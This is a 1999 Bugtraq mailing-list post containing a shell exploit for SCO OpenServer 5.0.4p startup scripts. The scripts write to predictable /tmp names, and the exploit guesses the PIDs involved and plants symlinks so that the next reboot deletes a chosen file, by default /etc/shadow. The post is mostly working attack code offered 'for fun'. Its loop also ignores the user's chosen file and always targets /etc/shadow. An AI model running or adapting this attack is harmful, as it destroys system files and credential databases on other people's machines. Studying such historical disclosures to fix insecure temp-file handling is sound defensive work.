[9827] in bugtraq
Little exploit for startup scripts (SCO 5.0.4p).
daemon@ATHENA.MIT.EDU (leshka)
Mon Mar 8 02:57:36 1999
Date: Sun, 7 Mar 1999 15:07:23 +0300
Reply-To: leshka <leshka@LESHKA.CHUVASHIA.SU>
From: leshka <leshka@LESHKA.CHUVASHIA.SU>
To: BUGTRAQ@NETSPACE.ORG
#!/bin/sh
#
# ... The punishment for inobedience ...
# (Cycle # 2)
#
# This simple script can help to erase any file
# (SCO OpenServer Enterprise System v 5.0.4p).
# Have fun !
#
#
#
#
# Some of "/etc/rc2.d" startup scripts create and then delete temporary files
# with easily predictable names in "/tmp" directory. Below there is a few
# interesting fragments of those nice scripts:
#
# S84rpcinit:
# ...
# /bin/su root -c "/bin/ps -ef" > /tmp/rpc$$ 2>/tmp/rpc.err$$
# /bin/rm -f /tmp/rpc.err$$
# ...
# rm -rf /tmp/rpc$$
#
# S95nis:
# ...
# /bin/su root -c "/bin/ps -ef" > /tmp/nis$$ 2>/tmp/nis.err$$
# /bin/rm -f /tmp/nis.err$$
# ...
# rm -f /tmp/nis$$
#
# S85tcp:
# ...
# /bin/su root -c "/bin/ps -ef" > /tmp/tps$$ 2>/tmp/ps.err$$
# /bin/rm -f /tmp/ps.err$$
# ...
# /bin/rm -f /tmp/tps$$
#
# S89nfs:
# ...
# /bin/su root -c "/bin/ps -ef" > /tmp/nfs$$ 2>/tmp/nfs.err$$
# /bin/rm -f /tmp/nfs.err$$
# ...
# rm -f /tmp/nfs$$
#
# Every time during the startup such shell scripts creates files with names
# that include a process number of the above shell script. My numerous tests
# showed that the number is always the same with every reboot. Pretty good,
# isn't it? One problem: how to determine the process number of such script?
# It's so simple! Child processes of this script have PID's with values
# slightly over than the parent's PID. A little math and one gets it. Next
# step is creating a few symbolic links to the victime file in the "/tmp"
# directory. During the next startup the victim file will be destroyed.
#
# P.S. Looking forward to getting published a complete SCO's list of names
# of such perfect shell scripts.
#
# 999,99*2
#
# ----------------------
# ---------------------------------------------
# ----------------- Dedicated to my beautiful lady ------------------
# ---------------------------------------------
# ----------------------
#
# Leshka Zakharoff, 1999. E-mail: leshka@leshka.chuvashia.su (.ru)
#
#
#
if [ _$1 = "_" ]
then
{
echo -n "File to delete [/etc/shadow]:"
read victim_file
if [ _$victim_file = "_" ]
then
victim_file="/etc/shadow"
fi
}
else
victim_file=$1
fi
pid=`/bin/ps -ef|/bin/grep -v awk|/usr/bin/awk '/inetd/ { printf $2 }'`
lastpid=`expr $pid - 30`
while [ $pid != $lastpid ]
do
pid=`expr $pid - 1`;ln -fs /etc/shadow /tmp/tps$pid
done
echo Done ! File \"$victim_file\" will be destroyed after the next reboot.
